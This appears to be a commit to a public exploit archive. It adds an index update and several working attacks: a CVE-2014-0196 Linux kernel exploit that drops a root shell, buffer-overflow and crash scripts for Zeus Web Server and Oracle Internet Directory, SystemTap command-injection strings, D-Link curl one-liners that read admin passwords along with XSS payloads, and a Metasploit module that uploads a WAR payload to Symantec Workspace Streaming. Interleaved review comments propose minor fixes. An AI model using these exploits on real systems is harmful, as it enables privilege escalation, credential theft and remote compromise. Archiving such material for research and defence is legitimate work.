Updated 05_28_2014

Offensive Security 2014-05-28 04:36:16 +00:00
parent 1a66c6956f
commit 9629404d0d
18 changed files with 1025 additions and 37 deletions


@ -1753,7 +1753,7 @@ id,file,description,date,author,platform,type,port
2052,platforms/windows/remote/2052.sh,"MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0
2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)",2006-07-21,bannedit,multiple,remote,110
2054,platforms/windows/remote/2054.txt,"MS Windows DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0
2056,platforms/windows/local/2056.c,"Microsoft IIS ASP Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0
2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0
2057,platforms/windows/dos/2057.c,"MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0
2058,platforms/php/webapps/2058.txt,"PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability",2006-07-22,"Virangar Security",php,webapps,0
2059,platforms/hardware/dos/2059.cpp,"D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)",2006-07-22,ub3rst4r,hardware,dos,0
@ -30174,7 +30174,6 @@ id,file,description,date,author,platform,type,port
33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 '$_SERVER['PHP_SELF']' Variable Multiple Cross Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0
33489,platforms/multiple/remote/33489.txt,"Ruby <= 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
33492,platforms/php/webapps/33492.txt,"kesako script SQL Injection",2014-05-24,Microsoft-dz,php,webapps,0
33495,platforms/windows/dos/33495.py,"Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.",2014-05-24,"Kaczinski Ramirez",windows,dos,0
33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal <= 4.5.1 Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
@ -30191,3 +30190,19 @@ id,file,description,date,author,platform,type,port
33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0
33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0
33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
33516,platforms/linux/local/33516.txt,"Linux kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80
33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming Arbitrary File Upload",2014-05-26,metasploit,multiple,remote,9855
33523,platforms/linux/local/33523.c,"Linux Kernel 2.6.x 'fasync_helper()' Local Privilege Escalation Vulnerability",2009-12-16,"Tavis Ormandy",linux,local,0
33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 Multiple Input Validation Vulnerabilities and Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0
33526,platforms/php/webapps/33526.txt,"Technology for Solutions 1.0 'id' Parameter Cross Site Scripting Vulnerability",2010-01-14,PaL-D3v1L,php,webapps,0
33527,platforms/unix/dos/33527.py,"IBM Tivoli Directory Server 6.2 'ibmdiradm' Null Pointer Dereference Denial of Service Vulnerability",2006-04-01,Intevydis,unix,dos,0
33528,platforms/php/webapps/33528.txt,"Xforum 1.4 'nbpageliste' Parameter Cross Site Scripting Vulnerability",2010-01-14,"ViRuSMaN ",php,webapps,0
33529,platforms/php/webapps/33529.txt,"Joomla! 'com_marketplace' Component 1.2 'catid' Parameter Cross-Site Scripting Vulnerability",2010-01-14,"ViRuSMaN ",php,webapps,0
33530,platforms/php/webapps/33530.txt,"LetoDMS 1.4.x 'lang' Parameter Local File Include Vulnerability",2010-01-15,"D. Fabian",php,webapps,0
33531,platforms/multiple/dos/33531.py,"Zeus Web Server 4.x 'SSL2_CLIENT_HELLO' Remote Buffer Overflow Vulnerability",2010-01-15,Intevydis,multiple,dos,0
33532,platforms/multiple/dos/33532.txt,"Oracle Internet Directory 10.1.2.0.2 'oidldapd' Remote Memory Corruption Vulnerability",2006-11-10,Intevydis,multiple,dos,0
33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl ActiveX Control 'ViewProfile' Method Heap Buffer Overflow Vulnerability",2010-01-18,karak0rsan,windows,dos,0
33534,platforms/php/webapps/33534.txt,"TestLink <= 1.8.5 'order_by_login_dir' Parameter Cross Site Scripting Vulnerability",2010-01-18,"Prashant Khandelwal",php,webapps,0
33535,platforms/linux/remote/33535.txt,"SystemTap 1.0 'stat-server' Remote Arbitrary Command Injection Vulnerability",2010-01-15,"Frank Ch. Eigler",linux,remote,0
33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0



@ -0,0 +1,105 @@
The following five D-Link model routers suffer from several
vulnerabilities including Clear Text Storage of Passwords, Cross Site
Scripting and Sensitive Information Disclosure.
DIR-652
D-Link Wireless N Gigabit Home Router
DIR-835
D-Link Network DIR-835L Wireless N 750M Dual-band 802.11n 4Port Gigabit Router
DIR-855L -
D-Link Wireless N900 Dual Band Gigabit Router
DGL-5500
D-Link AC1300 Gaming Router
DHP-1565
D-Link Wireless N PowerLine Gigabit Router
Affected firmware - FW 1.02b18/1.12b02 or older
Access - Remote
Complexity - Low
Authentication - None
Impact - Full loss of confidentiality
-------------------------------------------------------------------------------------------------------------
Clear Text Password - CWE - CWE-316: Cleartext Storage of Sensitive Information
Authentication can be bypassed to gain access to the file
tools_admin.asp, which stores the devices admin password in plain
text, by adding a "/" to the end of the URL.
Proof of Concept for the DGL-5500, DIR-855L and the DIR-835:
curl -s http://<IP>/tools_admin.asp/ |awk '/hidden/ &&
/admin_password_tmp/ && /value/ {print $5}'
PoC for the DHP-1565 and DIR-652, the generic 'user' must be added.
curl -s http://<IP>/tools_admin.asp/ -u user:|awk '/hidden/ &&
/admin_password_tmp/ && /value/ {print $5}'
-------------------------------------------------------------------------------------------------------------
Cross Site Scripting - CWE - CWE-79: Improper Neutralization of User
Input / Return
For the file "apply.cgi" ("apply_sec.cgi" on the DGL-5500) the POST
param "action" suffers from a XSS vulnerability due to improper
neutralization of user input / return output.
PoC for DIR-855L, DIR-835, DHP-1565
http://<IP>/apply.cgi
POST
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D
HTTP/1.1
For the DGL-5500
http://<IP>/apply_sec.cgi
POST
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D
HTTP/1.1
-------------------------------------------------------------------------------------------------------------
Sensitive Information Disclosure - CWE - CWE-200: Information Exposure
The D-Link models DGL-5500, DIR-855L, DIR-835 suffer from a
vulnerability which an unauthenticated person can gain access the
sensitive files:
http://<IP>:8080/hnap.cgi and /HNAP1/ via:
curl -s curl -s http://<IP>:8080/HNAP1/
On the DIR-652 and DHP-1565, a user needs authentication first to
gain access to these files.
But more importantly, an unauthenticated user can browse directly to
http://<IP>/cgi/ssi/ which will offer a download of the device's ELF
MBS MIPS file. The file contains most of the devices internal working
structure and sensitive information. These particular routers use a
MSB EM_MIPS Processor and it does contain executable components.
The file can be accessed through at least one known cgi file, however
there maybe others. Although no known publicly working example exist
to my knowledge, unpatched devices are susceptible to injection of
malicious code and most likely susceptible to a payload which could
deploy a self-replicating worm.
-------------------------------------------------------------------------------------------------------------
These items were reported to D-Link on April 20th, and to US Cert on
April 21. D-Link does have patches available for all affected models,
and it is highly recommended to update the device's firmware as soon
as possible.
Vendor Links:
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10025
http://securityadvisories.dlink.com/security/
Research Contact - Kyle Lovett
May 21, 2014

220
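--- a/platforms/linux/local/33516.txt
+++ b/platforms/linux/local/33516.txt
@@ -0,0 +1,220 @@
+/*
+* CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race
+* condition
+*
+* Slightly-less-than-POC privilege escalation exploit
+* For kernels >= v3.14-rc1
+*
+* Matthew Daley <mattd@bugfuzz.com>
+*
+* Usage:
+* $ gcc cve-2014-0196-md.c -lutil -lpthread
+* $ ./a.out
+* [+] Resolving symbols
+* [+] Resolved commit_creds: 0xffffffff81056694
+* [+] Resolved prepare_kernel_cred: 0xffffffff810568a7
+* [+] Doing once-off allocations
+* [+] Attempting to overflow into a tty_struct...............
+* [+] Got it :)
+* # id
+* uid=0(root) gid=0(root) groups=0(root)
+*
+* WARNING: The overflow placement is still less-than-ideal; there is a 1/4
+* chance that the overflow will go off the end of a slab. This does not
+* necessarily lead to an immediate kernel crash, but you should be prepared
+* for the worst (i.e. kernel oopsing in a bad state). In theory this would be
+* avoidable by reading /proc/slabinfo on systems where it is still available
+* to unprivileged users.
+*
+* Caveat: The vulnerability should be exploitable all the way from
+* v2.6.31-rc3, however relevant changes to the TTY subsystem were made in
+* commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer
+* GFP_ATOMIC memory consumption") that make exploitation simpler, which this
+* exploit relies on.
+*
+* Thanks to Jon Oberheide for his help on exploitation technique.
+*/
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <pty.h>
+#include <stdio.h>
+#include <string.h>
+#include <termios.h>
+#include <unistd.h>
+#define TTY_MAGIC 0x5401
+#define ONEOFF_ALLOCS 200
+#define RUN_ALLOCS 30
+struct device;
+struct tty_driver;
+struct tty_operations;
+typedef struct {
+int counter;
+} atomic_t;
+struct kref {
+atomic_t refcount;
+};
+struct tty_struct_header {
+int magic;
+struct kref kref;
+struct device *dev;
+struct tty_driver *driver;
+const struct tty_operations *ops;
+} overwrite;
+typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);
+int master_fd, slave_fd;
+char buf[1024] = {0};
+commit_creds_fn commit_creds;
+prepare_kernel_cred_fn prepare_kernel_cred;
+int payload(void) {
+commit_creds(prepare_kernel_cred(0));
+return 0;
+}
+unsigned long get_symbol(char *target_name) {
+FILE *f;
+unsigned long addr;
+char dummy;
+char name[256];
+int ret = 0;
+f = fopen("/proc/kallsyms", "r");
+if (f == NULL)
+return 0;
+while (ret != EOF) {
+ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);
+if (ret == 0) {
+fscanf(f, "%s\n", name);
+continue;
+}
+if (!strcmp(name, target_name)) {
+printf("[+] Resolved %s: %p\n", target_name, (void *)addr);
+fclose(f);
+return addr;
+}
+}
+printf("[-] Couldn't resolve \"%s\"\n", name);
+fclose(f);
+return 0;
+}
+void *overwrite_thread_fn(void *p) {
+write(slave_fd, buf, 511);
+write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));
+write(slave_fd, &overwrite, sizeof(overwrite));
+}
+int main() {
+char scratch[1024] = {0};
+void *tty_operations[64];
+int i, temp_fd_1, temp_fd_2;
+for (i = 0; i < 64; ++i)
+tty_operations[i] = payload;
+overwrite.magic = TTY_MAGIC;
+overwrite.kref.refcount.counter = 0x1337;
+overwrite.dev = (struct device *)scratch;
+overwrite.driver = (struct tty_driver *)scratch;
+overwrite.ops = (struct tty_operations *)tty_operations;
+puts("[+] Resolving symbols");
+commit_creds = (commit_creds_fn)get_symbol("commit_creds");
+prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");
+if (!commit_creds || !prepare_kernel_cred)
+return 1;
+puts("[+] Doing once-off allocations");
+for (i = 0; i < ONEOFF_ALLOCS; ++i)
+if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {
+puts("[-] pty creation failed");
+return 1;
+}
+printf("[+] Attempting to overflow into a tty_struct...");
+fflush(stdout);
+for (i = 0; ; ++i) {
+struct termios t;
+int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;
+pthread_t overwrite_thread;
+if (!(i & 0xfff)) {
+putchar('.');
+fflush(stdout);
+}
+if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {
+puts("\n[-] pty creation failed");
+return 1;
+}
+for (j = 0; j < RUN_ALLOCS; ++j)
+if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {
+puts("\n[-] pty creation failed");
+return 1;
+}
+close(fds[RUN_ALLOCS / 2]);
+close(fds2[RUN_ALLOCS / 2]);
+write(slave_fd, buf, 1);
+tcgetattr(master_fd, &t);
+t.c_oflag &= ~OPOST;
+t.c_lflag |= ECHO;
+tcsetattr(master_fd, TCSANOW, &t);
+if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {
+puts("\n[-] Overwrite thread creation failed");
+return 1;
+}
+write(master_fd, "A", 1);
+pthread_join(overwrite_thread, NULL);
+for (j = 0; j < RUN_ALLOCS; ++j) {
+if (j == RUN_ALLOCS / 2)
+continue;
+ioctl(fds[j], 0xdeadbeef);
+ioctl(fds2[j], 0xdeadbeef);
+close(fds[j]);
+close(fds2[j]);
+}
+ioctl(master_fd, 0xdeadbeef);
+ioctl(slave_fd, 0xdeadbeef);
+close(master_fd);
+close(slave_fd);
+if (!setresuid(0, 0, 0)) {
+setresgid(0, 0, 0);
+puts("\n[+] Got it :)");
+execl("/bin/bash", "/bin/bash", NULL);
+}
+}
+}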
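Review bot: The failure message at the end of get_symbol prints the wrong variable: `name` holds whatever symbol was read last from /proc/kallsyms, not the symbol that was being looked for, so the diagnostic misleads anyone reading the log of a failed run; it should be `printf("[-] Couldn't resolve \"%s\"\n", target_name);`. In the same file, overwrite_thread_fn is declared to return `void *` but falls off the end without a value, which is undefined behaviour and a compiler warning; add `return NULL;` as its last statement. Both are log/hygiene fixes in an archived PoC, not changes to what it does.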

57
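--- a/platforms/linux/local/33523.c
+++ b/platforms/linux/local/33523.c
@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/37806/info
+Linux kernel is prone to a local privilege-escalation vulnerability.
+Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges.
+Successful exploits will result in the complete compromise of affected computers.
+The Linux Kernel 2.6.28 and later are vulnerable.
+#ifndef _GNU_SOURCE
+# define _GNU_SOURCE
+#endif
+#include <stdio.h>
+#include <unistd.h>
+#include <stdint.h>
+#include <stdbool.h>
+#include <fcntl.h>
+#include <stdlib.h>
+#include <assert.h>
+#include <asm/ioctls.h>
+// Testcase for locked async fd bug -- taviso 16-Dec-2009
+int main(int argc, char **argv)
+{
+int fd;
+pid_t child;
+unsigned flag = ~0;
+fd = open("/dev/urandom", O_RDONLY);
+// set up exclusive lock, but dont block
+flock(fd, LOCK_EX | LOCK_NB);
+// set ASYNC flag on descriptor
+ioctl(fd, FIOASYNC, &flag);
+// close the file descriptor to trigger the bug
+close(fd);
+// now exec some stuff to populate the AT_RANDOM entries, which will cause
+// the released file to be used.
+// This assumes /bin/true is an elf executable, and that this kernel
+// supports AT_RANDOM.
+do switch (child = fork()) {
+case 0: execl("/bin/true", "/bin/true", NULL);
+abort();
+case -1: fprintf(stderr, "fork() failed, %m\n");
+break;
+default: fprintf(stderr, ".");
+break;
+} while (waitpid(child, NULL, 0) != -1);
+fprintf(stderr, "waitpid() failed, %m\n");
+return 1;
+}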
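Review bot: The five advisory lines at the top of this file (from `source: http://www.securityfocus.com/bid/37806/info` through `The Linux Kernel 2.6.28 and later are vulnerable.`) are plain prose placed before `#ifndef _GNU_SOURCE` with no comment delimiters, so the file as committed under a `.c` name does not parse; the other C entry in this commit, 33516.txt, keeps its header inside a `/* ... */` block, and this one should do the same. Separately, the translation unit calls `flock`, `ioctl` and `waitpid` without including `<sys/file.h>`, `<sys/ioctl.h>` or `<sys/wait.h>`, which is an implicit-declaration warning in C89 and an error under C99 and later; the original 2009 testcase presumably relied on older toolchain defaults.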


@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/37842/info
SystemTap is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.
Versions prior to SystemTap 1.1 are vulnerable.
The following example commands are available:
stap-client \; ...
stap-client -; ...
stap-client -D 'asdf ; ls /etc' ...
stap-client -e 'script' -D 'asdf ; \; '

52
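--- a/platforms/multiple/dos/33531.py
+++ b/platforms/multiple/dos/33531.py
@@ -0,0 +1,52 @@
+source: http://www.securityfocus.com/bid/37829/info
+Zeus Web Server is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+Versions prior to Zeus Web Server 4.3r5 are vulnerable.
+#!/usr/bin/env python
+# zeus_ssl2.py
+#
+# Use this code at your own risk. Never run it against a production system.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+import socket
+import sys
+import struct
+def send_req(host,port):
+buf=""
+buf+=chr(1)
+buf+="\x00\x02"
+buf+=struct.pack(">H",21)
+buf+=struct.pack(">H",0xffff)
+buf+=struct.pack(">H",16)
+buf+="\x07\x00\xc0\x03\x00\x80\x01\x00\x80\x08\x00\x80"
+buf+="\x06\x00\x40\x04\x00\x80\x02\x00\x80"
+buf+="A"* 50000
+buf+="C"*16
+siz = chr( ( (len(buf) & 0xff00) >> 8)| 0x80) + chr(len(buf)&0xff)
+buf = siz + buf
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((host,port))
+sock.sendall(buf)
+sock.recv(1000)
+sock.close()
+if __name__=="__main__":
+if len(sys.argv)<3:
+print "usage: %s host port" % sys.argv[0]
+sys.exit()
+send_req(sys.argv[1],int(sys.argv[2]))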
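Review bot: The four advisory lines that precede `#!/usr/bin/env python` are bare prose, so the committed `.py` file raises a SyntaxError on its first line under any interpreter; they should be `#`-prefixed or placed inside a module docstring so the shebang stays on line 1. The script itself is Python 2 only (`print "usage: ..."` statement, `str` concatenated with `struct.pack` output), which is worth a one-line comment in the header, e.g. `# Python 2 only: relies on str/bytes equivalence and the print statement`. Also, `sys.exit()` after the usage message exits with status 0; `sys.exit(1)` would let callers distinguish a usage error from a normal run.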


@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/37833/info
Oracle Internet Directory is prone to a remote memory-corruption vulnerability.
Exploits may allow attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.
Oracle Internet Directory 10.1.2.0.2 is vulnerable; other versions may also be affected.
NOTE: This issue may be a duplicate of an existing BID and may have already been addressed by the vendor. We will update the BID if more information emerges.
s ="\x30\x82\x27\x4a\x02\x01\x01\x63\x82\x27\x43\x04\x00\x0a\x01\x02"
s+="\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa4\x82\x27\x2e"
s+="\x04\x04\x6d\x61\x69\x6c\x30\x82\x27\x24\x80\x04\x66\x6f\x6f\x40"
s+="\x81\x04\x75\x6e\x69\x76"
s+="\x82"*10000
s+="\x82\x06\x6d\x75\x6e\x69\x63\x68"


@ -0,0 +1,356 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Workspace Streaming Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Symantec Workspace Streaming. The
vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
as_agent.exe service, which allows for uploading arbitrary files under the server root.
This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
to achieve remote code execution. This module has been tested successfully on Symantec
Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
machine deployment, and also in the backend role in a multiple machine deployment.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-1649'],
['BID', '67189'],
['ZDI', '14-127'],
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00']
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 12 2014'))
register_options(
[
Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file)
OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy)
], self.class)
end
def send_xml_rpc_request(xml)
res = send_request_cgi(
{
'uri' => normalize_uri("/", "xmlrpc"),
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => xml
})
res
end
def build_soap_get_file(file_path)
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.getFile"
params = xml.root.add_element("params")
param_server_root = params.add_element("param")
value_server_root = param_server_root.add_element("value")
value_server_root.text = "*AWESE"
param_file_type = params.add_element("param")
value_file_type = param_file_type.add_element("value")
type_file_type = value_file_type.add_element("i4")
type_file_type.text = "0" # build path from the server root directory
param_file_name = params.add_element("param")
value_file_name = param_file_name.add_element("value")
value_file_name.text = file_path
param_file_binary = params.add_element("param")
value_file_binary = param_file_binary.add_element("value")
type_file_binary = value_file_binary.add_element("boolean")
type_file_binary.text = "0"
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def build_soap_put_file(file)
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.putFile"
params = xml.root.add_element("params")
param_server_root = params.add_element("param")
value_server_root = param_server_root.add_element("value")
value_server_root.text = "*AWESE"
param_file_type = params.add_element("param")
value_file_type = param_file_type.add_element("value")
type_file_type = value_file_type.add_element("i4")
type_file_type.text = "0" # build path from the server root directory
param_file = params.add_element("param")
value_file = param_file.add_element("value")
type_value_file = value_file.add_element("ex:serializable")
type_value_file.text = file
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def build_soap_check_put
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.putFile"
xml.root.add_element("params")
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def parse_method_response(xml)
doc = Document.new(xml)
file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable")
unless file.nil?
file = Rex::Text.decode_base64(file.text)
end
file
end
def get_file(path)
xml_call = build_soap_get_file(path)
file = nil
res = send_xml_rpc_request(xml_call)
if res && res.code == 200 && res.body
file = parse_method_response(res.body.to_s)
end
file
end
def put_file(file)
result = nil
xml_call = build_soap_put_file(file)
res = send_xml_rpc_request(xml_call)
if res && res.code == 200 && res.body
result = parse_method_response(res.body.to_s)
end
result
end
def upload_war(war_name, war, dst)
result = false
java_file = build_java_file_info("#{dst}#{war_name}", war)
java_file = Rex::Text.encode_base64(java_file)
res = put_file(java_file)
if res && res =~ /ReturnObject.*StatusMessage.*Boolean/
result = true
end
result
end
def jboss_deploy_path
path = nil
leak = get_file("bin/CreateDatabaseSchema.cmd")
if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/
path = $1
end
path
end
def check
check_result = Exploit::CheckCode::Safe
if jboss_deploy_path.nil?
xml = build_soap_check_put
res = send_xml_rpc_request(xml)
if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/
check_result = Exploit::CheckCode::Detected
end
else
check_result = Exploit::CheckCode::Appears
end
check_result
end
def exploit
print_status("#{peer} - Leaking the jboss deployment directory...")
jboss_path =jboss_deploy_path
if jboss_path.nil?
fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory")
end
print_status("#{peer} - Building WAR payload...")
app_name = Rex::Text.rand_text_alpha(4 + rand(4))
war_name = "#{app_name}.war"
war = payload.encoded_war({ :app_name => app_name }).to_s
deploy_dir = "..#{jboss_path}"
print_status("#{peer} - Uploading WAR payload...")
res = upload_war(war_name, war, deploy_dir)
unless res
fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload")
end
register_files_for_cleanup("../server/appstream/deploy/#{war_name}")
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET',
'rport' => ste_port # Auto Deploy can be reached through the "as_ste.exe" service
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
def ste_port
datastore['STE_PORT']
end
# com.appstream.cm.general.FileInfo serialized object
def build_java_file_info(file_name, contents)
stream = "\xac\xed" # stream magic
stream << "\x00\x05" # stream version
stream << "\x73" # new Object
stream << "\x72" # TC_CLASSDESC
stream << ["com.appstream.cm.general.FileInfo".length].pack("n")
stream << "com.appstream.cm.general.FileInfo"
stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier
stream << "\x02" # flags SC_SERIALIZABLE
stream << [6].pack("n") # number of fields in the class
stream << "Z" # boolean
stream << ["bLastPage".length].pack("n")
stream << "bLastPage"
stream << "J" # long
stream << ["lFileSize".length].pack("n")
stream << "lFileSize"
stream << "[" # array
stream << ["baContent".length].pack("n")
stream << "baContent"
stream << "\x74" # TC_STRING
stream << ["[B".length].pack("n")
stream << "[B" # field's type (byte array)
stream << "L" # Object
stream << ["dTimeStamp".length].pack("n")
stream << "dTimeStamp"
stream << "\x74" # TC_STRING
stream << ["Ljava/util/Date;".length].pack("n")
stream << "Ljava/util/Date;" #field's type (Date)
stream << "L" # Object
stream << ["sContent".length].pack("n")
stream << "sContent"
stream << "\x74" # TC_STRING
stream << ["Ljava/lang/String;".length].pack("n")
stream << "Ljava/lang/String;" #field's type (String)
stream << "L" # Object
stream << ["sFileName".length].pack("n")
stream << "sFileName"
stream << "\x71" # TC_REFERENCE
stream << [0x007e0003].pack("N") # handle
stream << "\x78" # TC_ENDBLOCKDATA
stream << "\x70" # TC_NULL
# Values
stream << [1].pack("c") # bLastPage
stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize
stream << "\x75" # TC_ARRAY
stream << "\x72" # TC_CLASSDESC
stream << ["[B".length].pack("n")
stream << "[B" # byte array)
stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier
stream << "\x02" # flags SC_SERIALIZABLE
stream << [0].pack("n") # number of fields in the class
